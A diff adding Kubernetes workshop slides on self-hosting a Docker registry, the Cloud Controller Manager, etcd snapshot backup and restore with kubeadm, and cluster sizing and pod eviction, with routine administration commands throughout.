- [Authenticating with bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/)
|
||||
|
||||
- [TLS bootstrapping](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/)
|
||||
|
||||
- [kubeadm token](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-token/) command
|
||||
|
||||
- [kubeadm join](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/) command (has details about [the join workflow](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/#join-workflow))
|
||||
40
slides/k8s/buildshiprun-dockerhub.md
Normal file
@@ -0,0 +1,40 @@
|
||||
## Using images from the Docker Hub
|
||||
|
||||
- For everyone's convenience, we took care of building DockerCoins images
|
||||
|
||||
- We pushed these images to the DockerHub, under the [dockercoins](https://hub.docker.com/u/dockercoins) user
|
||||
|
||||
- These images are *tagged* with a version number, `v0.1`
|
||||
|
||||
- The full image names are therefore:
|
||||
|
||||
- `dockercoins/hasher:v0.1`
|
||||
|
||||
- `dockercoins/rng:v0.1`
|
||||
|
||||
- `dockercoins/webui:v0.1`
|
||||
|
||||
- `dockercoins/worker:v0.1`
|
||||
|
||||
---
|
||||
|
||||
## Setting `$REGISTRY` and `$TAG`
|
||||
|
||||
- In the upcoming exercises and labs, we use a couple of environment variables:
|
||||
|
||||
- `$REGISTRY` as a prefix to all image names
|
||||
|
||||
- `$TAG` as the image version tag
|
||||
|
||||
- For example, the worker image is `$REGISTRY/worker:$TAG`
|
||||
|
||||
- If you copy-paste the commands in these exercises:
|
||||
|
||||
**make sure that you set `$REGISTRY` and `$TAG` first!**
|
||||
|
||||
- For example:
|
||||
```
|
||||
export REGISTRY=dockercoins TAG=v0.1
|
||||
```
|
||||
|
||||
(this will expand `$REGISTRY/worker:$TAG` to `dockercoins/worker:v0.1`)
|
||||
235
slides/k8s/buildshiprun-selfhosted.md
Normal file
@@ -0,0 +1,235 @@
|
||||
## Self-hosting our registry

*Note: this section shows how to run the Docker open source registry and use it to ship images on our cluster. While this method works fine, we recommend that you consider using one of the hosted, free automated build services instead. It will be much easier!*

*If you need to run a registry on premises, this section gives you a starting point, but you will need to make a lot of changes so that the registry is secured, highly available, and so that your build pipeline is automated.*

---

## Using the open source registry

- We need to run a `registry` container

- It will store images and layers on the local filesystem
  <br/>(but you can add a config file to use S3, Swift, etc.)

- Docker *requires* TLS when communicating with the registry

  - except for registries on `127.0.0.0/8` (i.e. `localhost`)

  - or with the Engine flag `--insecure-registry`

- Our strategy: publish the registry container on a NodePort,
  <br/>so that it's available through `127.0.0.1:xxxxx` on each node

---

## Deploying a self-hosted registry

- We will deploy a registry container, and expose it with a NodePort

.exercise[

- Create the registry service:
  ```bash
  kubectl create deployment registry --image=registry
  ```

- Expose it on a NodePort:
  ```bash
  kubectl expose deploy/registry --port=5000 --type=NodePort
  ```

]

---

## Connecting to our registry

- We need to find out which port has been allocated

.exercise[

- View the service details:
  ```bash
  kubectl describe svc/registry
  ```

- Get the port number programmatically:
  ```bash
  NODEPORT=$(kubectl get svc/registry -o json | jq .spec.ports[0].nodePort)
  REGISTRY=127.0.0.1:$NODEPORT
  ```

]
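
(If `jq` is not available, an equivalent using kubectl's built-in JSONPath support:)

```bash
# Same result, without jq
NODEPORT=$(kubectl get svc/registry -o jsonpath='{.spec.ports[0].nodePort}')
REGISTRY=127.0.0.1:$NODEPORT
```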
---

## Testing our registry

- A convenient Docker registry API route to remember is `/v2/_catalog`

.exercise[

<!-- ```hide kubectl wait deploy/registry --for condition=available```-->

- View the repositories currently held in our registry:
  ```bash
  curl $REGISTRY/v2/_catalog
  ```

]

--

We should see:
```json
{"repositories":[]}
```

---

## Testing our local registry

- We can retag a small image, and push it to the registry

.exercise[

- Make sure we have the busybox image, and retag it:
  ```bash
  docker pull busybox
  docker tag busybox $REGISTRY/busybox
  ```

- Push it:
  ```bash
  docker push $REGISTRY/busybox
  ```

]

---

## Checking again what's on our local registry

- Let's use the same endpoint as before

.exercise[

- Ensure that our busybox image is now in the local registry:
  ```bash
  curl $REGISTRY/v2/_catalog
  ```

]

The curl command should now output:
```json
{"repositories":["busybox"]}
```

---

## Building and pushing our images

- We are going to use a convenient feature of Docker Compose

.exercise[

- Go to the `stacks` directory:
  ```bash
  cd ~/container.training/stacks
  ```

- Build and push the images:
  ```bash
  export REGISTRY
  export TAG=v0.1
  docker-compose -f dockercoins.yml build
  docker-compose -f dockercoins.yml push
  ```

]

Let's have a look at the `dockercoins.yml` file while this is building and pushing.
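
While it builds, a quick way to see how Compose resolves `$REGISTRY` and `$TAG` (a sanity check, not part of the lab):

```bash
# Render the fully-resolved Compose file and show the image references
docker-compose -f dockercoins.yml config | grep "image:"
```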
---

```yaml
version: "3"

services:
  rng:
    build: dockercoins/rng
    image: ${REGISTRY-127.0.0.1:5000}/rng:${TAG-latest}
    deploy:
      mode: global
  ...
  redis:
    image: redis
  ...
  worker:
    build: dockercoins/worker
    image: ${REGISTRY-127.0.0.1:5000}/worker:${TAG-latest}
    ...
    deploy:
      replicas: 10
```

.warning[Just in case you were wondering ... Docker "services" are not Kubernetes "services".]

---

class: extra-details

## Avoiding the `latest` tag

.warning[Make sure that you've set the `TAG` variable properly!]

- If you don't, the tag will default to `latest`

- The problem with `latest`: nobody knows what it points to!

  - the latest commit in the repo?

  - the latest commit in some branch? (Which one?)

  - the latest tag?

  - some random version pushed by a random team member?

- If you keep pushing the `latest` tag, how do you roll back?

- Image tags should be meaningful, i.e. correspond to code branches, tags, or hashes
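
One common way to get meaningful tags, assuming the images are built from a git checkout (a sketch, not part of the lab):

```bash
# Tag images with the current git tag, or the commit hash if no tag points here
export TAG=$(git describe --tags --always)
docker-compose -f dockercoins.yml build
docker-compose -f dockercoins.yml push
```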
---

## Checking the content of the registry

- All our images should now be in the registry

.exercise[

- Re-run the same `curl` command as earlier:
  ```bash
  curl $REGISTRY/v2/_catalog
  ```

]

*In these slides, all the commands to deploy DockerCoins will use a $REGISTRY environment variable, so that we can quickly switch from the self-hosted registry to pre-built images hosted on the Docker Hub. So make sure that this $REGISTRY variable is set correctly when running the exercises!*
slides/k8s/cloud-controller-manager.md (new file)
@@ -0,0 +1,144 @@
# The Cloud Controller Manager

- Kubernetes has many features that are cloud-specific

  (e.g. providing cloud load balancers when a Service of type LoadBalancer is created)

- These features were initially implemented in the API server and the controller manager

- Since Kubernetes 1.6, these features are available through a separate process:

  the *Cloud Controller Manager*

- The CCM is optional, but if we run in a cloud, we probably want it!

---

## Cloud Controller Manager duties

- Creating and updating cloud load balancers

- Configuring routing tables in the cloud network (specific to GCE)

- Updating node labels to indicate region, zone, instance type...

- Obtaining the node's name and internal/external addresses from the cloud metadata service

- Deleting nodes from Kubernetes when they're deleted in the cloud

- Managing *some* volumes (e.g. EBS volumes, AzureDisks...)

  (Eventually, volumes will be managed by the Container Storage Interface)

---

## In-tree vs. out-of-tree

- A number of cloud providers are supported "in-tree"

  (in the main kubernetes/kubernetes repository on GitHub)

- More cloud providers are supported "out-of-tree"

  (with code in different repositories)

- There is an [ongoing effort](https://github.com/kubernetes/kubernetes/tree/master/pkg/cloudprovider) to move everything to out-of-tree providers

---

## In-tree providers

The following providers are actively maintained:

- Amazon Web Services
- Azure
- Google Compute Engine
- IBM Cloud
- OpenStack
- VMware vSphere

These ones are less actively maintained:

- Apache CloudStack
- oVirt
- VMware Photon

---

## Out-of-tree providers

The list includes the following providers:

- DigitalOcean

- keepalived (not exactly a cloud; provides VIPs for load balancers)

- Linode

- Oracle Cloud Infrastructure

(And possibly others; there is no central registry for these.)

---

## Audience questions

- What kind of clouds are you using/planning to use?

- What kind of details would you like to see in this section?

- Would you appreciate details on clouds that you don't / won't use?

---

## Cloud Controller Manager in practice

- Write a configuration file

  (typically `/etc/kubernetes/cloud.conf`)

- Run the CCM process

  (on self-hosted clusters, this can be a DaemonSet selecting the control plane nodes)

- Start kubelet with `--cloud-provider=external`

- When using managed clusters, this is done automatically

- There is very little documentation on writing the configuration file

  (except for OpenStack)
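
For example, on a kubeadm-deployed node, the kubelet flag typically goes in a file like `/etc/default/kubelet` (a sketch; the exact file location varies across distributions, and this overwrites any existing extra args):

```bash
# Tell kubelet that an external process (the CCM) provides cloud details
echo 'KUBELET_EXTRA_ARGS=--cloud-provider=external' | sudo tee /etc/default/kubelet
sudo systemctl restart kubelet
```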
---

## Bootstrapping challenges

- When a node joins the cluster, it needs to obtain a signed TLS certificate

- That certificate must contain the node's addresses

- These addresses are provided by the Cloud Controller Manager

  (at least the external address)

- To get these addresses, the node needs to communicate with the control plane

- ...Which means joining the cluster

(The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)

---

## More information about CCM

- CCM configuration and operation is highly specific to each cloud provider

  (which is why this section remains very generic)

- The Kubernetes documentation has *some* information:

  - [architecture and diagrams](https://kubernetes.io/docs/concepts/architecture/cloud-controller/)

  - [configuration](https://kubernetes.io/docs/concepts/cluster-administration/cloud-providers/) (mainly for OpenStack)

  - [deployment](https://kubernetes.io/docs/tasks/administer-cluster/running-cloud-controller/)
slides/k8s/cluster-backup.md (new file)
@@ -0,0 +1,362 @@
# Backing up clusters

- Backups can have multiple purposes:

  - disaster recovery (servers or storage are destroyed or unreachable)

  - error recovery (human or process has altered or corrupted data)

  - cloning environments (for testing, validation...)

- Let's see the strategies and tools available with Kubernetes!

---

## Important

- Kubernetes helps us with disaster recovery

  (it gives us replication primitives)

- Kubernetes helps us clone / replicate environments

  (all resources can be described with manifests)

- Kubernetes *does not* help us with error recovery

- We still need to back up or snapshot our data:

  - with database backups (mysqldump, pg_dump, etc.)

  - and/or snapshots at the storage layer

  - and/or traditional full disk backups

---

## In a perfect world ...

- The deployment of our Kubernetes clusters is automated

  (recreating a cluster takes less than a minute of human time)

- All the resources (Deployments, Services...) on our clusters are under version control

  (never use `kubectl run`; always apply YAML files coming from a repository)

- Stateful components are either:

  - stored on systems with regular snapshots

  - backed up regularly to an external, durable storage

  - outside of Kubernetes

---

## Kubernetes cluster deployment

- If our deployment system isn't fully automated, it should at least be documented

- Litmus test: how long does it take to deploy a cluster...

  - for a senior engineer?

  - for a new hire?

- Does it require external intervention?

  (e.g. provisioning servers, signing TLS certs...)

---

## Plan B

- Full machine backups of the control plane can help

- If the control plane is in pods (or containers), pay attention to storage drivers

  (if the backup mechanism is not container-aware, the backups can take way more resources than they should, or even be unusable!)

- If the previous sentence worries you:

  **automate the deployment of your clusters!**

---

## Managing our Kubernetes resources

- Ideal scenario:

  - never create a resource directly on a cluster

  - push to a code repository

  - a special branch (`production` or even `master`) gets automatically deployed

- Some folks call this "GitOps"

  (it's the logical evolution of configuration management and infrastructure as code)

---

## GitOps in theory

- What do we keep in version control?

- For very simple scenarios: source code, Dockerfiles, scripts

- For real applications: add resources (as YAML files)

- For applications deployed multiple times: Helm, Kustomize...

  (staging and production count as "multiple times")

---

## GitOps tooling

- Various tools exist (Weave Flux, GitKube...)

- These tools are still very young

- You still need to write YAML for all your resources

- There is no tool to:

  - list *all* resources in a namespace

  - get resource YAML in a canonical form

  - diff YAML descriptions with current state
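
(A common workaround to approximate the first point: ask the API server which resource types support `list`, then list them all. A sketch:)

```bash
# List every listable, namespaced resource in the "default" namespace
kubectl api-resources --verbs=list --namespaced -o name |
  xargs -n1 kubectl get -o name -n default --ignore-not-found
```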
---

## GitOps in practice

- Start describing your resources with YAML

- Leverage a tool like Kustomize or Helm

- Make sure that you can easily deploy to a new namespace

  (or even better: to a new cluster)

- When tooling matures, you will be ready
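
With Kustomize, for instance, "deploying to a new namespace" can be as simple as applying an overlay (the directory name here is hypothetical):

```bash
# Each overlay sets its own namespace, image tags, replica counts...
kubectl apply -k overlays/staging
```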
---

## Plan B

- What if we can't describe everything with YAML?

- What if we manually create resources and forget to commit them to source control?

- What about global resources, that don't live in a namespace?

- How can we be sure that we saved *everything*?

---

## Backing up etcd

- All objects are saved in etcd

- etcd data should be relatively small

  (and therefore, quick and easy to back up)

- Two options to back up etcd:

  - snapshot the data directory

  - use `etcdctl snapshot`

---

## Making an etcd snapshot

- The basic command is simple:
  ```bash
  etcdctl snapshot save <filename>
  ```

- But we also need to specify:

  - an environment variable (`ETCDCTL_API=3`) to select the etcdctl v3 API

  - the address of the server to back up

  - the path to the key, certificate, and CA certificate
    <br/>(if our etcd uses TLS certificates)

---

## Snapshotting etcd on kubeadm

- The following command will work on clusters deployed with kubeadm

  (and maybe others)

- It should be executed on a master node

```bash
docker run --rm --net host -v $PWD:/vol \
    -v /etc/kubernetes/pki/etcd:/etc/kubernetes/pki/etcd:ro \
    -e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
    etcdctl --endpoints=https://[127.0.0.1]:2379 \
    --cacert=/etc/kubernetes/pki/etcd/ca.crt \
    --cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
    --key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
    snapshot save /vol/snapshot
```

- It will create a file named `snapshot` in the current directory

---

## How can we remember all these flags?

- Look at the static pod manifest for etcd

  (in `/etc/kubernetes/manifests`)

- The healthcheck probe is calling `etcdctl` with all the right flags
  😉👍✌️

- Exercise: write the YAML for a batch job to perform the backup

  (one possible sketch follows)
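
Here is one possible solution, as a hedged sketch: it mirrors the `docker run` command above (same image, endpoint, and certificate paths; the job name and the `/tmp/etcd-backup` host directory are arbitrary choices), and it assumes the pod lands on the master node (in a real cluster, add a nodeSelector and tolerations for that).

```bash
kubectl apply -f - <<'EOF'
apiVersion: batch/v1
kind: Job
metadata:
  name: etcd-backup
spec:
  template:
    spec:
      hostNetwork: true              # so we can reach etcd on 127.0.0.1:2379
      restartPolicy: Never
      containers:
      - name: etcdctl
        image: k8s.gcr.io/etcd:3.3.10
        env:
        - name: ETCDCTL_API
          value: "3"
        command:
        - etcdctl
        - --endpoints=https://[127.0.0.1]:2379
        - --cacert=/etc/kubernetes/pki/etcd/ca.crt
        - --cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt
        - --key=/etc/kubernetes/pki/etcd/healthcheck-client.key
        - snapshot
        - save
        - /vol/snapshot
        volumeMounts:
        - name: pki
          mountPath: /etc/kubernetes/pki/etcd
          readOnly: true
        - name: vol
          mountPath: /vol
      volumes:
      - name: pki
        hostPath:
          path: /etc/kubernetes/pki/etcd
      - name: vol
        hostPath:
          path: /tmp/etcd-backup
EOF
```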
---

## Restoring an etcd snapshot

- ~~Execute exactly the same command, but replacing `save` with `restore`~~

  (Believe it or not, doing that will *not* do anything useful!)

- The `restore` command does *not* load a snapshot into a running etcd server

- The `restore` command creates a new data directory from the snapshot

  (it's an offline operation; it doesn't interact with an etcd server)

- We will create the new data directory in a temporary container

  (leaving the running etcd node untouched)

---

## When using kubeadm

1. Create a new data directory from the snapshot:
   ```bash
   sudo rm -rf /var/lib/etcd
   docker run --rm -v /var/lib:/var/lib -v $PWD:/vol \
       -e ETCDCTL_API=3 k8s.gcr.io/etcd:3.3.10 \
       etcdctl snapshot restore /vol/snapshot --data-dir=/var/lib/etcd
   ```

2. Provision the control plane, using that data directory:
   ```bash
   sudo kubeadm init \
       --ignore-preflight-errors=DirAvailable--var-lib-etcd
   ```

3. Rejoin the other nodes

---

## The fine print

- This only saves etcd state

- It **does not** save persistent volumes and local node data

- Some critical components (like the pod network) might need to be reset

- As a result, our pods might have to be recreated, too

- If we have proper liveness checks, this should happen automatically

---

## More information about etcd backups

- [Kubernetes documentation](https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#built-in-snapshot) about etcd backups

- [etcd documentation](https://coreos.com/etcd/docs/latest/op-guide/recovery.html#snapshotting-the-keyspace) about snapshots and restore

- [A good blog post by elastisys](https://elastisys.com/2018/12/10/backup-kubernetes-how-and-why/) explaining how to restore a snapshot

- [Another good blog post by consol labs](https://labs.consol.de/kubernetes/2018/05/25/kubeadm-backup.html) on the same topic

---

## Don't forget ...

- Also back up the TLS information

  (at the very least: CA key and cert; API server key and cert)

- With clusters provisioned by kubeadm, this is in `/etc/kubernetes/pki`

- If you don't:

  - you will still be able to restore etcd state and bring everything back up

  - but you will need to redistribute user certificates

.warning[**TLS information is highly sensitive!
<br/>Anyone who has it has full access to your cluster!**]
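
A minimal sketch of that extra backup step (the archive name is arbitrary):

```bash
# Archive the kubeadm PKI material alongside the etcd snapshot
sudo tar -czf pki-backup.tar.gz -C /etc/kubernetes pki
# Store this archive as carefully as you would store root credentials!
```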
---

## Stateful services

- It's totally fine to keep your production databases outside of Kubernetes

  *Especially if you have only one database server!*

- Feel free to put development and staging databases on Kubernetes

  (as long as they don't hold important data)

- Using Kubernetes for stateful services makes sense if you have *many*

  (because then you can leverage Kubernetes automation)

---

## Snapshotting persistent volumes

- Option 1: snapshot volumes out of band

  (with the API/CLI/GUI of our SAN/cloud/...)

- Option 2: storage system integration

  (e.g. [Portworx](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/) can [create snapshots through annotations](https://docs.portworx.com/portworx-install-with-kubernetes/storage-operations/create-snapshots/snaps-annotations/#taking-periodic-snapshots-on-a-running-pod))

- Option 3: [snapshots through the Kubernetes API](https://kubernetes.io/blog/2018/10/09/introducing-volume-snapshot-alpha-for-kubernetes/)

  (now in alpha for a few storage providers: GCE, OpenSDS, Ceph, Portworx)

---

## More backup tools

- [Stash](https://appscode.com/products/stash/)

  back up Kubernetes persistent volumes

- [ReShifter](https://github.com/mhausenblas/reshifter)

  cluster state management

- ~~Heptio Ark~~ [Velero](https://github.com/heptio/velero)

  full cluster backup

- [kube-backup](https://github.com/pieterlange/kube-backup)

  simple scripts to save resource YAML to a git repository
slides/k8s/cluster-sizing.md (new file)
@@ -0,0 +1,167 @@
# Cluster sizing

- What happens when the cluster gets full?

- How can we scale up the cluster?

- Can we do it automatically?

- What are other methods to address capacity planning?

---

## When are we out of resources?

- kubelet monitors node resources:

  - memory

  - node disk usage (typically the root filesystem of the node)

  - image disk usage (where container images and RW layers are stored)

- For each resource, we can provide two thresholds:

  - a hard threshold (if it's met, it provokes immediate action)

  - a soft threshold (provokes action only after a grace period)

- Resource thresholds and grace periods are configurable

  (by passing kubelet command-line flags, as shown below)
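
A hedged sketch of what these flags can look like (the values are illustrative, not recommendations):

```bash
# Illustrative values only; combine with the node's usual kubelet flags
kubelet \
  --eviction-hard='memory.available<500Mi,nodefs.available<10%' \
  --eviction-soft='memory.available<1Gi' \
  --eviction-soft-grace-period='memory.available=1m'
```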
---

## What happens then?

- If disk usage is too high:

  - kubelet will try to remove terminated pods

  - then, it will try to *evict* pods

- If memory usage is too high:

  - it will try to evict pods

- The node is marked as "under pressure"

- This temporarily prevents new pods from being scheduled on the node

---

## Which pods get evicted?

- kubelet looks at the pods' QoS and PriorityClass

- First, pods with BestEffort QoS are considered

- Then, pods with Burstable QoS exceeding their *requests*

  (but only if the exceeding resource is the one that is low on the node)

- Finally, pods with Guaranteed QoS, and Burstable pods within their requests

- Within each group, pods are sorted by PriorityClass

- If there are pods with the same PriorityClass, they are sorted by usage excess

  (i.e. the pods whose usage exceeds their requests the most are evicted first)

---

class: extra-details

## Eviction of Guaranteed pods

- *Normally*, pods with Guaranteed QoS should not be evicted

- A chunk of resources is reserved for node processes (like kubelet)

- It is expected that these processes won't use more than this reservation

- If they do use more resources anyway, all bets are off!

- If this happens, kubelet must evict Guaranteed pods to preserve node stability

  (or Burstable pods that are still within their requested usage)

---

## What happens to evicted pods?

- The pod is terminated

- It is marked as `Failed` at the API level

- If the pod was created by a controller, the controller will recreate it

- The pod will be recreated on another node, *if there are resources available!*

- For more details about the eviction process, see:

  - [this documentation page](https://kubernetes.io/docs/tasks/administer-cluster/out-of-resource/) about resource pressure and pod eviction,

  - [this other documentation page](https://kubernetes.io/docs/concepts/configuration/pod-priority-preemption/) about pod priority and preemption.

---

## What if there are no resources available?

- Sometimes, a pod cannot be scheduled anywhere:

  - all the nodes are under pressure,

  - or the pod requests more resources than are available

- The pod then remains in `Pending` state until the situation improves

---

## Cluster scaling

- One way to improve the situation is to add new nodes

- This can be done automatically with the [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler)

- The autoscaler will automatically scale up:

  - if there are pods that failed to be scheduled

- The autoscaler will automatically scale down:

  - if nodes have a low utilization for an extended period of time

---

## Restrictions, gotchas ...

- The Cluster Autoscaler only supports a few cloud infrastructures

  (see [the provider list](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler/cloudprovider) for details)

- The Cluster Autoscaler cannot scale down nodes that have pods using:

  - local storage

  - affinity/anti-affinity rules preventing them from being rescheduled

  - a restrictive PodDisruptionBudget

---

## Other ways to do capacity planning

- "Running Kubernetes without nodes"

- Systems like [Virtual Kubelet](https://virtual-kubelet.io/) or Kiyot can run pods using on-demand resources

  - Virtual Kubelet can leverage e.g. ACI or Fargate to run pods

  - Kiyot runs pods in ad-hoc EC2 instances (1 instance per pod)

- Economic advantage (no wasted capacity)

- Security advantage (stronger isolation between pods)

Check [this blog post](http://jpetazzo.github.io/2019/02/13/running-kubernetes-without-nodes-with-kiyot/) for more details.